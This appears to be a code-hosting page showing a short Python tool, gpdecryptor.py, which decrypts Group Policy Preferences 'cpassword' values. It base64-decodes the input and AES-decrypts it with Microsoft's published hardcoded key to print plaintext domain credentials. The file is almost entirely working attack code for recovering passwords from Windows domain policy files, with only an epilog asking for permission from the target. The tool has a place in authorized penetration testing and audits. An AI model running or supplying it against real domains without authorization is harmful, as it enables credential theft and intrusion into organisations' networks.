0xvoodoo/GroupPolicyPasswordDecryptor
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
683233c5567dcb469ef90ea521dd58a008a8002d
GroupPolicyPasswordDecryptor/gpdecryptor.py
T
0xVoodoo 8c6bae4bf3 Initial commit
2025-08-19 18:09:20 -06:00

72 lines
2.8 KiB
Python
Raw Blame History

from base64 import b64decode
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import argparse
# Shout out to https://github.com/reider-roque - This is a re-write of their gpprefdecrypt tool!
#pretty colors :)
RESET = "\033[0m"
RED = "\033[31m"
GREEN = "\033[32m"
YELLOW = "\033[33m"
BOLD = "\033[1m"
def getHash(file):
print(f"{BOLD}{YELLOW}[*]{RESET} Getting hash from file")
try:
with open(file, 'r') as f:
passwd = f.read().lstrip().rstrip()
except FileNotFoundError:
print(f"{BOLD}{RED}[-]{RESET} File not found!")
raise SystemExit()
except PermissionError:
print(f"{BOLD}{RED}[-]{RESET} User does not have permission to read:", file)
raise SystemExit()
return passwd
def decodePasswd(passwd):
print(f"{BOLD}{YELLOW}[*]{RESET} Decoding password")
paddingLength = len(passwd)%4
if paddingLength != 0:
passwd += '=' * (4 - paddingLength)
decodedPasswd = b64decode(passwd)
if len(decodedPasswd)%16 != 0:
print(f"{BOLD}{RED}[-]{RESET} Decoded password does not meet AES block length, ensure you've provided a valid password!")
raise SystemExit()
return decodedPasswd
def decryptPasswd(passwd):
print(f"{BOLD}{YELLOW}[*]{RESET} Decrypting password")
#Key from http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
key = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
initVector = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
decryptedBytes = AES.new(key, AES.MODE_CBC, initVector).decrypt(passwd)
decryptedPasswd = unpad(decryptedBytes, AES.block_size).decode('utf-16')
return decryptedPasswd
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog='gpdecryptor.py',
description='This util will decrypt passwords stored in Group Policy Password Encryption',
epilog=f'Only use on with explicit permssion from the target.\nWritten by 0xVoodoo - Don\'t be a skid :)' )
argGroup = parser.add_mutually_exclusive_group(required=True)
argGroup.add_argument('-f', '--file', help='File containing the hash to crack')
argGroup.add_argument('-p', '--password', help='Hash to crack')
args = parser.parse_args()
print(f"{BOLD}=={GREEN}Group Policy password decryptor by{RESET} {BOLD}{RED}0xVoodoo{RESET}{BOLD}=={RESET}")
if args.password:
passwd = args.password.lstrip().rstrip()
decodedPasswd = decodePasswd(passwd)
elif args.file:
passwd = getHash(args.file)
decodedPasswd = decodePasswd(passwd)
decryptedPassword = decryptPasswd(decodedPasswd)
print(f"{BOLD}{GREEN}[+]{RESET} Password decrypted: {BOLD}{RED}{decryptedPassword}{RESET}")
Reference in New Issue View Git Blame Copy Permalink